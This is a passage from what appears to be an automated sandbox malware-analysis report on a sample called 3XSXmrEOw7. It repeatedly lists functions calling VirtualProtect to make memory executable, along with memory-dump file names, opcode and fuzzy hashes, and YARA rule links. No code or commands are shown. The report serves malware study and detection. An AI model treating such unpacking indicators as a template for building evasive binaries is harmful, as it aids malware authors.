                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: c5aa534f724c0a8c924347ab72f71a43756768e995d9007230a018139a930da0
                                                                                                                                              • Instruction ID: de9717e0791dd079f802cc80978fd1fc09d249abcbc8c2fa0664e0f4ee9ea232
                                                                                                                                              • Opcode Fuzzy Hash: c5aa534f724c0a8c924347ab72f71a43756768e995d9007230a018139a930da0
                                                                                                                                              • Instruction Fuzzy Hash: DCD136A2D082649AF7208624DC44BEB7A69DF51314F0440FED98D672C1DABE1FC6CB67
                                                                                                                                              Function 00406EA9 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 367memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 6d8c275d99a29c13d98e9956aa79e6e28d4ca0fb23a5d38f81c72338007ea39f
                                                                                                                                              • Instruction ID: 0aac46a3f7d70648d6f49242e283d0af4f9a7a282a53a1faa8e93d764a905c88
                                                                                                                                              • Opcode Fuzzy Hash: 6d8c275d99a29c13d98e9956aa79e6e28d4ca0fb23a5d38f81c72338007ea39f
                                                                                                                                              • Instruction Fuzzy Hash: 3FD126E2D082649AF7208624DC44BEB7A68DF51314F1440FED94DA62C1D6BE1FC6CB67
                                                                                                                                              Function 00406F1B Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 366memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 522f41798cca4e8217d8314f8d4b31a1fb35cd02f5402e6ed2d5148ca51ec446
                                                                                                                                              • Instruction ID: c42c67ffbe9c770f0b4030029c86904fbf9cde12d90d93a0a162ff4bceb9b38a
                                                                                                                                              • Opcode Fuzzy Hash: 522f41798cca4e8217d8314f8d4b31a1fb35cd02f5402e6ed2d5148ca51ec446
                                                                                                                                              • Instruction Fuzzy Hash: 56D127E2C082649AF7208624EC447EB7A79EF51314F1440FED94DA62C1D6BE1FC68B67
                                                                                                                                              Function 00406EB7 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 365memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 799cf96d208df78444660078e2104325f2ee3c4a420d3db674c8bcb6f4dc4c4c
                                                                                                                                              • Instruction ID: 458d38c4ac4ac2e0a890c9bb8e4a9faea148a723fd4b00d52b4af6688bdf90c3
                                                                                                                                              • Opcode Fuzzy Hash: 799cf96d208df78444660078e2104325f2ee3c4a420d3db674c8bcb6f4dc4c4c
                                                                                                                                              • Instruction Fuzzy Hash: 4ED135E2D082649AF7208624EC447EB7A68EF51314F1440FED94DA62C1D6BE1FC6CB67
                                                                                                                                              Function 00406FD0 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 365memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: f008ab9c7c818f81744ee77cf2c6e55b4ec4b83fb5e804deb6bf64c9298d7c23
                                                                                                                                              • Instruction ID: 59163a79f1e718bf8fdf548af5e6fdd436e52e4d132ed39006692e3f8e990f66
                                                                                                                                              • Opcode Fuzzy Hash: f008ab9c7c818f81744ee77cf2c6e55b4ec4b83fb5e804deb6bf64c9298d7c23
                                                                                                                                              • Instruction Fuzzy Hash: 36D147A2D042649AF7208624EC44BEB7A69DF51310F0440FED94DA72C1D6BE5FC6CB67
                                                                                                                                              Function 00406F2C Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 364memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 26fbc9ab7792db71d7a3ca395d2d03866270531154e9b2181aac9bc8d78f0471
                                                                                                                                              • Instruction ID: 6c61b91d5ed829c07fb3eca1805c18e4c1d41d2c227a964cc652b6df1d4533f5
                                                                                                                                              • Opcode Fuzzy Hash: 26fbc9ab7792db71d7a3ca395d2d03866270531154e9b2181aac9bc8d78f0471
                                                                                                                                              • Instruction Fuzzy Hash: 51D135E2C082649AF7208624DC447EB7A69EF51314F1480FED94DA62C1D6BE1FC6CB67
                                                                                                                                              Function 00408098 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 363memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 736f7411ec79d40dddd1db38831dba188a81169fb3a5d6ffb08c0fc51e07d7d1
                                                                                                                                              • Instruction ID: 283ebc008c54337029ad982e6338bed2757a0bab3e3c0bbaa6d50b25317a4fa5
                                                                                                                                              • Opcode Fuzzy Hash: 736f7411ec79d40dddd1db38831dba188a81169fb3a5d6ffb08c0fc51e07d7d1
                                                                                                                                              • Instruction Fuzzy Hash: C2D146B2C082649AF7208624DC447EB7A68DF51314F1440FED98DA62C1DABE5FC6CB67
                                                                                                                                              Function 00407152 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 362COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 1ab454213d97a097068b25bdb4cb47c85771fadaecd6cb952ead88962a443a05
                                                                                                                                              • Instruction ID: a52d7f9a2be6bdc38b4d8026e473589b155c0d63e94e31f5312e0c049a63bb1f
                                                                                                                                              • Opcode Fuzzy Hash: 1ab454213d97a097068b25bdb4cb47c85771fadaecd6cb952ead88962a443a05
                                                                                                                                              • Instruction Fuzzy Hash: C9D136A2D082649AF7208624DC44BEB7A69DF51314F0440FED94D672C1DABE1FC6CB67
                                                                                                                                              Function 00406CE6 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 361COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
